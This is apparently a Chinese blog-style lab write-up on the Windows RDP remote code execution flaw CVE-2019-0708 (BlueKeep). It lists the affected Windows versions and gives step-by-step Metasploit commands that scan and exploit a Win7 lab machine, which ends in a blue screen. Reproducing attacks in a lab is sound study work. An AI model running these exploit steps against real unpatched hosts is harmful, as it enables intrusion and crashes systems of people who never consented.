摘要: Windows RDP 服务高危漏洞
2019 年 5 月 14 日微软官方发布紧急安全补丁,修复了 Windows 远程桌面服务的远程代码执行高危漏洞 CVE-2019-0708(CNVD-2019-14264、CNNVD-201905-434),该漏洞影响了某些旧版本的 Windows 系统。由于该漏洞无需身份验证且无需用户交互,所以这个漏洞可以通过网络蠕虫的方式被利用,利用此漏洞的恶意软件可以从被感染的计算机传播到网络中其他易受攻击的计算机,传播方式与 2017 年 WannaCry 恶意软件的传播方式类似。
· Windows 7
· Windows Server 2008
· Windows Server 2008 R2
· Windows 2003
· Windows XP
漏洞复现:此漏洞已经上传到metasploit
实验准备:kali 192.168.1.180
Win7 192.168.1.133
1. 命令行输入msfconsole后,查找模块
Search 0708
2. 使用分析模块
Use auxiliary/scanner/rdp/cve_2019_0708_bluekeep
Show options
Set RHOSTS 192.168.1.133(靶机ip)
3. 设置攻击模块
Use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
Show options
Set RHOSTS 192.168.1.133
Run
靶机出现蓝屏,说明该漏洞被利用